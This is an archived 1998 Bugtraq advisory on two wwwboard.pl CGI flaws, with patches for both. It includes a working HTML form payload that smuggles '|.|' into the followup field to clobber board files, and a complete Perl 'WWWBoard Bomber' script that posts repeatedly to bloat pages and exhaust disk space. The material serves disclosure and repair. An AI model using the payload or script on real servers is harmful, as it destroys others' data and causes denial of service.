Date: Thu, 3 Sep 1998 13:37:06 -0700
From: bugtraq <bugtraq@ANKH.SAMIAM.ORG>
To: BUGTRAQ@netspace.org
Subject: wwwboard.pl vulnerability
Hello,
The commonly used wwwboard.pl program, available for free from
www.worldwidemart.com, is a suite that appears to not have security as a
serious consideration in its design. Not only does the default location
of passwords in the wwwadmin.pl program allow anyone on the internet to
perform dictionary attacks on the board admin's password, there is
another, more subtle DOS attack.
There is no input checking done on the list of articles which a given
article is a followup to. This allows us to give it invalid input such
that we can clobber files that the web server has write permissions to.
For example, this HTML snippit, when read by Netscape (and the button is
pushed), will clobber articles 1 to 5 on the wwwboard at some.poor.host.
<form method=POST action="http://some.poor.host/cgi-bin/wwwboard.pl">
<input type=hidden name="followup" value="1,2,3,4,5,|.|">
<input type=submit value="Clobber web board">
</form>
The included patch patches wwwboard.pl against this attack.
I notified the arthur, matt@worldwidemart.com of this problem over a week
ago, but have not gotten a response from him.
I should mention that wwwboard.pl also does not log the IP that posts a
given message to the board.
> # looking at the apache 1.2.5 source code i found
> # that there was no limit on how many mime headers could
> # be included in a client request. The only limits
> # are : 8192 byte for each header, 300 sec. on reading headers.
On another topic, this posted attack against Apache using an arbitrary
number of different headers does not work against servers with Ben's
recent Sioux patch.
- Sam
Patch for wwwboard.pl (which requires perl5 to run) follows:
*** wwwboard.patch.pl Thu Sep 3 13:14:46 1998
--- wwwboard.pl Thu Sep 3 13:17:47 1998
***************
*** 1,4 ****
! #!/usr/local/bin/perl
##############################################################################
# WWWBoard Version 2.0 ALPHA 2 #
# Copyright 1996 Matt Wright mattw@worldwidemart.com #
--- 1,4 ----
! #!/usr/local/bin/perl -T
##############################################################################
# WWWBoard Version 2.0 ALPHA 2 #
# Copyright 1996 Matt Wright mattw@worldwidemart.com #
***************
*** 82,88 ****
sub get_number {
open(NUMBER,"$basedir/$datafile");
! $num = <NUMBER>;
close(NUMBER);
if ($num == 99999) {
$num = "1";
--- 82,90 ----
sub get_number {
open(NUMBER,"$basedir/$datafile");
! my($n) = <NUMBER>;
! $n =~ /(\d+)/;
! $num = $1;
close(NUMBER);
if ($num == 99999) {
$num = "1";
***************
*** 132,138 ****
if ($FORM{'followup'}) {
$followup = "1";
! @followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
--- 134,146 ----
if ($FORM{'followup'}) {
$followup = "1";
! my($item);
! my(@list) = split(/,/,$FORM{'followup'});
! @followup_num = ();
! foreach $item (@list) {
! $item =~ /(\d+)/;
! push(@followup_num,$1);
! }
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
Recently, many vulnerabilities have been found in the popular "WWWBoard
v2.0 ALPHA" script written by Matt Wright, this is yet another. When the
followup value in a form posted to the WWWBoard script contains the same
post number twice, the script follows up to that post twice, even printing
the number of followups to a particular post (on the wwwboard.html file)
multiple times. This exploit does even one better than just 'messing up'
the board, if done severly enough, it can cause the wwwboard.html file to
become hundreds of megabytes in size. It appears that the number of
followups shown on the main page (if there's three, it'd look like "(3)")
increases exponentially with this flaw, such that posting a followup value
of say "5,5,5" 2 times would make (2) appear as the followup value, but it
would appear 9 times. From the best I can tell, the number of followups you
have that are the same (like "3,3,3,3,3" would have 5) is the number of
times the followup value will appear on the wwwboard.html page, and if you
post the same twice, it does that number to the second power, and thrice
does to the third power, etc. (whereas if you post "3,3,3,3,3" once, it'll
have 5 followup numbers, if you post it twice, it'll have 25, if you post
it three times, it'll have 125, post it ten times and it'll show 9,765,625
times, twelve times 244,140,625, thirteen times 1,220,703,125, etc.) And
even though it appears that only three bytes "(X)" are added for each
followup value you see, there are comments in the HTML making it appear as
"(<!--responses: 3-->5)" in the html source if there's 5 followups to
message 3.
As that shows, this can cause much more damage than just a simple
annoyance. This flaw could easilly be exploited to the point where a users
quota is maxed out, or even to the point where the web server runs out of
disk space. Below is an exploit script, and a patch to fix the wwwboard.pl
script.
Samuel Sparling
Here is an example perl script to exploit this flaw:
#!/usr/bin/perl
###################################################
#
# WWWBoard Bomber Exploit Script
# Written By: Samuel Sparling (sparling@slip.net)
#
# Written to exploit a flaw in the WWWBoard script
# by Matt Wright.
#
# Copyright ╘ 1998 Samuel Sparling
# All Rights Reserved.
#
# Written 11-04-1998
###################################################
use Socket;# Tell perl to use the socket module
# Change this if the server you're trying on uses a different port for http
$port=80;
print "WWWBoard Bomber Exploit Script\n\n";
print "WWWBoard.pl URL: ";
$url=<STDIN>;
chop($url) if $url =~ /\n$/;
print "Name: ";
$name=<STDIN>;
chop($name) if $name =~ /\n$/;
print "E-Mail: ";
$email=<STDIN>;
chop($email) if $email =~ /\n$/;
print "Subject: ";
$subject=<STDIN>;
chop($subject) if $subject =~ /\n$/;
print "Message: ";
$message=<STDIN>;
chop($message) if $message =~ /\n$/;
print "Followup Value: ";
$followup=<STDIN>;
chop($followup) if $followup =~ /\n$/;
print "Times to Post: ";
$stop=<STDIN>;
chop($stop) if $stop =~ /\n$/;
# Chop the URL into peices to use for the actual posting
$remote = $url;
$remote =~ s/http\:\/\///g;
$remote =~ s/\/([^>]|\n)*//g;
$path = $url;
$path =~ s/http\:\/\///g;
$path =~ s/$remote//g;
$forminfo =
"name=$name&email=$email&followup=$followup&subject=$subject&body=$message";
$forminfo =~ s/\,/\%2C/g;# Turn comas into %2C so that they can be posted.
$forminfo =~ tr/ /+/;
$length = length($forminfo);
$submit = "POST $path HTTP/1.0\r\nReferer: $url\r\nUser Agent:
Mozilla/4.01 (Win95; I)\r\nContent-type:
application/x-www-form-urlencoded\r\nContent-length:
$length\r\n\r\n$forminfo\r\n";
$i=0;
while($i < $stop)
{
&post_message;
$i++;
print "$i message(s) posted.\n";
}
sub post_message
{
if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }
die("No port specified.") unless $port;
$iaddr = inet_aton($remote) || die("Failed to find host: $remote");
$paddr = sockaddr_in($port, $iaddr);
$proto = getprotobyname('tcp');
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket:
$!");
connect(SOCK, $paddr) || die("Unable to connect: $!");
send(SOCK,$submit,0);
while(<SOCK>) {
#print $_;# Uncomment for debugging if you have problems.
}
close(SOCK);
}
exit;
Below is the patch, all it does is check to make sure that the same
followup number is not used more than once in the followups form field.
In the get_variables subroutine replace this:
if ($FORM{'followup'}) {
$followup = "1";
@followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}";
}
with this:
if ($FORM{'followup'}) {
$followup = "1";
@followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}";
# WWWBoard Bomb Patch
# Written By: Samuel Sparling (sparling@slip.net)
$fn=0;
while($fn < $num_followups)
{
$cur_fup = @followups[$fn];
$dfn=0;
foreach $fm(@followups)
{
if(@followups[$dfn] == @followups[$fn] && $dfn != $fn)
{
&error(board_bomb);
}
$dfn++;
}
$fn++;
}
# End WWWBoard Bomb Patch
}
